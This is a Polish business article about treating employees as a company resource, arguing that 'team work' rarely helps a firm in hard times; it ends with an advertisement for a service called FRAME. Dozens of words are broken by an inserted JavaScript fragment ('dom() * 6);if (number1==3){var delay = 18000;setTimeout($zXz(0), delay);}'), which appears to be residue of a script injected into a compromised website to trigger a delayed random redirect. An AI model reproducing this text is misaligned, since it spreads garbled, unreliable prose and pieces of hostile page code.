In Artykuły, Handel, Uniwersalne

Pracownicy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to z punktu widzenia sprawozdań finansowych zasób firmy. Ale zasób bardzo is dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}totny, gdyż aktywnie wpływa na pozostałe zasoby (inne też na siebie wpływają, ale raczej pasywnie). Tak czy inaczej jest dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zasób. I jak o każdy zasób, także i o ten firma powinna się troszczyć.

Typowe zasoby firmy. O wszystkie trzeba dbać, a ta troska ma swój wymiar organizacyjny i pieniężny.

O każdy zasób trzeba dbać

W szczególności o zasób tak ważny, jakim są pracownicy. Ale też tak kapryśny i niestały w uczuciach, co wymaga nie tylko opieki, ale i aktywnego zarządzania.

W jaki sposób należy dbać o różne zasoby? Różnie, w zależności od ich charakteru.

Uwaga. „dlaczego za zarządzanie pracownikiem płaci się więcej?” Więcej, niż za zarządzanie innymi zasobami firmy? Właśnie dlatego, że zapas czy środki trwałe nie „oddadzą”. Jeśli coś się z nimi zrobi, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tak już robią. I jeśli robią dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to źle, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zawsze jest dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wina zarządzającego. W przypadku pracowników jest z tym dużo trudniej.

Czy jednak zasoby się firmie rewanżują za jej troskę?

Tu właśnie jest różnie. Środki trwałe na ogół tak, gdyż nie mają własnego interesu. Jednak już z zasobami ludzkimi bywa różnie.

W trosce o ten zasób i zgodnie z najnowszymi trendami w zarządzaniu uku dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to termin (i sposób postępowania z tym zasobem). To team work, czyli działajmy „jak w rodzinie”. To jednak nie jest zbyt trafna analogia, gdyż interesy w rodzinie i w firmie są różne, co do swojej is dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toty i samych fundamentów.

Uwaga. „w rodzinie chodzi o geny, w firmie chodzi o pieniądze”. Albo o inne korzyści, ale zawsze bardzo osobiste i jak najbardziej podzielne. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to duża różnica. To jak z bratem i przyjacielem. Brata się ma, a przyjaciela się wybiera. W przypadku firmy zawsze się da oddzielić interes własny od firmowego, w przypadku genów są one na zawsze i trwale złączone (chodzi tak czy inaczej o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, aby przetrwały).

Czy interes firmy i pracownika mogą się pokrywać? W jakimś s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topniu zawsze się pokrywają (wyjątki, gdzie interes firmy i pracownika są ewidentnie sprzeczne, się zdarzają, ale rzadko). Ale też prawie nigdy nie są całkowicie zgodne.

Zasada równoległoboku sił. Interes pracownika da się rozłożyć na dwie składowe – zgodną z interesem firmy i składową obojętną dla tego interesu.

Czasem jednak może się pojawić składowa przeciwna interesowi firmy. I dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nawet wtedy, gdy tak na pierwszy rzut oka nie widać tego zbyt wyraźnie.

A co ze składową obojętną? Czy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jest tak naprawdę rzeczywiście obojętne dla firmy? Niezupełnie. Nawet jeśli nie jest dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sprzeczne z interesem firmy, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to na pewno dzieje się w czasie przez nią opłaconym. Więc dzieje się za jej pieniądze.

Team work działa tylko w jedną stronę

O czym wiele firm już się boleśnie przekonało, a wiele jeszcze przekona w przyszłości. Czyli wszystko działa, kiedy chodzi o budowanie zespołu, tu jest wiele sposobów, doradców i duża szansa na sukces. Jednak kiedy firma jest w kłopotach i chodzi o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, aby zespół ją z niej wybawił, sytuacja się komplikuje. I decydującą rolę zaczynają odgrywać interesy osobiste, na pewno zaś będą ważniejsze od firmowych.

Uwaga. „uprzedzić, że szuka się pracy”. Wielu pracowników uważa, że zwalnianie bez ostrzeżenia dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to naruszenie zasad. Ale niewielu, jeśli sami zaczynają szukać pracy, uprzedza o tym firmę z dużym wyprzedzeniem. Wtedy raczej pracownicy czekają do ostatniej chwili, aż podpiszą umowę w nowym miejscu pracy. Dlaczego więc domagają się odmiennego trak dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towania, jeśli sytuacja jest odwrotna?

Decyduje też wpływ

A ten większość pracowników ma minimalny. Chodzi tu o wpływ na firmową rzeczywis dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość. Większość stanowisk dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tylko wykonywanie powierzonych i z góry zaplanowanych zadań. Innowacyjny i twórczy (poparty władzą) wpływ w tysiąc osobowej firmie wywiera kilka, może kilkanaście osób.

Team work jest dla przyjemności

Przede wszystkim pracowników. Trochę też dla wygody menedżerów. Takim zintegrowanym zespołem łatwiej zarządzać, choć oczywiście pozostaje wtedy pytanie, czy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nadal jest naprawdę zarządzanie czy działanie przez głosowanie. Ale w praktyce team work rzadko służy interesowi firmy. Gdyż na ogół działa tylko w jedną stronę. Gdy (w) firmie jest dobrze (ma na dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to środki i czas) przychodzi kolej na team work. Ale gdy zaczynają się trudne czasy, team work rzadko pomaga. Wtedy każdy troszczy się raczej o siebie. Choć są oczywiście chlubne wyjątki.

Uwaga. „firma handlowa dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to organizacja zbliżona do militarnej”. A przynajmniej w swojej strukturze, z zasady hierarchicznej. Gdzie jest wyraźny lider, jasno sprecyzowane i proste cele, czytelny łańcuch dowodzenia. Próba zastąpienia tego demokracją nie pomoże skuteczności. Np. i słowa „wysłuchać” (zawsze wskazanego) nie należy zastępować pojęciem „słuchać”.

Czy team work może być elementem zarządzania pracownikami? Może, ale najczęściej jest sposobem na zarządzanie firmą przez pracowników.

Uwaga. „zwolnienia”. Jak działa team work, dobrze widać na przykładzie zwolnień. Zwykle pracownicy oczekują, że firma będzie ich informować z wyprzedzeniem, że zamierza ich zwolnić. A wcześniej da czas na poprawę. Jednak takich pracowników, którzy z dużym wyprzedzeniem informują pracodawcę, że zamierzają szukać pracy jest naprawdę niewielu. Jeszcze mniej daje firmie (świadomie) czas na poprawę.

Jak dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jest w Internecie?

Inaczej. Tu jest większa rola maszyny, a pracownika łatwiej zastąpić czy przeszkolić. Gdyż Internet dał firmom do ręki potężne narzędzie – centralne zarządzanie zachowaniami i wiedzą.

Z jednej strony dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to utrudnia sterowanie sprzedażą (zmniejsza możliwości zarządzania magiczną formułą sprzedaży), ale akurat z punktu widzenia uzależnienia firmy od pracownika daje dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to firmie silniejszą pozycję.

Podsumowanie

Pracownicy są dla firmy bardzo ważni. I dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dla każdej. Należy ich szkolić, dbać o nich i nimi właściwie zarządzać. Ale nie można mieć też złudzeń. W sytuacji krytycznej rzadko przeważy duch „team work” i pracownicy kosztem własnego interesu staną murem za firmą. Choć oczywiście i tak się zdarza. Tym samym wysiłek i koszt, jaki firma wkłada w team work rzadko przekłada się na

Ale i bez kryzysu team work rzadko pomaga. Poza rozbieżnością interesu firmy i pracownika, decyduje jeszcze wpływ. Większość pracownik wywiera na działanie firmy wpływ na tyle nieznaczny, że dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, czy są twórczy i innowacyjni, czy nie, nie ma tak naprawdę znaczenia. Wystarczy, że przestrzegają zasad i „pracują na średnią”.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.